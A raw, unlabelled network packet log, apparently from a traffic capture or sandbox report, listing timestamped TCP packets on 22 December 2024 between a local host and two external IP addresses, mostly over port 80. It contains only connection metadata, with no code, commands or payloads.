                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.824635983 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.825787067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.825804949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.825826883 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.825844049 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.826915979 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.826972961 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.827012062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.827059031 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.828133106 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.828176975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.828249931 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.828288078 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.829354048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.829392910 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.829447031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.829485893 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.830550909 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.830586910 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.830699921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.830741882 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.831816912 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.831860065 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.831927061 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.831970930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.833101034 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.833142996 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.833142996 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.833189011 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.834256887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.834299088 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.834312916 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.834355116 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.835514069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.835551977 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.835567951 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.835589886 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.836672068 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.836715937 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.836800098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.836844921 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.837837934 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.837878942 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.867480040 CET44349806172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.867572069 CET44349806172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.867644072 CET49806443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.919343948 CET49806443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.919409990 CET44349806172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.965625048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.965671062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.965706110 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.965728998 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.965729952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.965768099 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.965771914 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.965811014 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.966686010 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.966737986 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.966809034 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.966856003 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.967772961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.967819929 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.967889071 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.967931032 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.968930006 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.968981981 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.969048023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.969094992 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.970014095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.970066071 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.970132113 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.970175028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.971136093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.971183062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.971251011 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.971295118 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.972223043 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.972273111 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.972356081 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.972402096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.973469019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.973520041 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.973526955 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.973572969 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.974497080 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.974550962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.974554062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.974596024 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.975626945 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.975688934 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.975737095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.975781918 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.976737022 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.976794004 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.976843119 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.976886988 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.977930069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.977984905 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.978066921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.978106976 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.979115963 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.979152918 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.979176998 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.979202032 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.980102062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.980156898 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.980158091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.980201960 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.981231928 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.981287956 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.981726885 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.981771946 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.982294083 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.982337952 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.982405901 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.982456923 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.983433962 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.983480930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.983542919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.983589888 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.984534979 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.984580040 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.984662056 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.984708071 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.985646963 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.985696077 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.985759020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.985795021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.986934900 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.986972094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.986979961 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.987011909 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.987896919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.987943888 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.988010883 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.988050938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.989078045 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.989130974 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.989303112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.989357948 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.990135908 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.990190029 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.990273952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.990319967 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.991261005 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.991323948 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.991400957 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.991449118 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.992364883 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.992436886 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.992468119 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.992520094 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.993463993 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.993531942 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.993642092 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.993689060 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.994606972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.994663954 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.994765997 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.994812012 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.995697975 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.995754004 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.995803118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.995855093 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.996838093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.996890068 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.996949911 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.997056007 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.998019934 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.998069048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.998078108 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.998117924 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.999031067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.999084949 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.999167919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.999216080 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.000185966 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.000236988 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.000319958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.000366926 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.001292944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.001338959 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.001466036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.001511097 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.002404928 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.002465963 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.002532959 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.002578974 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.003561974 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.003617048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.003715038 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.003774881 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.004687071 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.004745007 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.004784107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.004833937 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.005796909 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.005855083 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.005875111 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.005923033 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.006894112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.006961107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.006966114 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.007041931 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.007973909 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.008027077 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.008126020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.008167982 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.009126902 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.009181023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.009212971 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.009257078 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.010217905 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.010272980 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.010376930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.010420084 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.011348009 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.011390924 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.011476994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.011514902 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.012517929 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.012567043 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.012614965 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.012655973 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.013567924 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.013608932 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.013658047 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.013698101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.014672995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.014713049 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.014765978 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.014807940 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.015778065 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.015816927 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.015886068 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.015927076 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.016917944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.016968966 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.017009020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.017070055 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.018021107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.018071890 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.018292904 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.018342018 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.019146919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.019197941 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.019279957 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.019328117 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.020437002 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.020457029 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.020493984 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.020509005 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.021393061 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.021444082 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.021805048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.021853924 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.022495031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.022546053 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.022610903 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.022650003 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.023622036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.023672104 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.157774925 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.157831907 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.157860994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.157883883 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.158155918 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.158195019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.158245087 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.159132957 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.159182072 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.159182072 CET4980480192.168.2.431.41.244.11
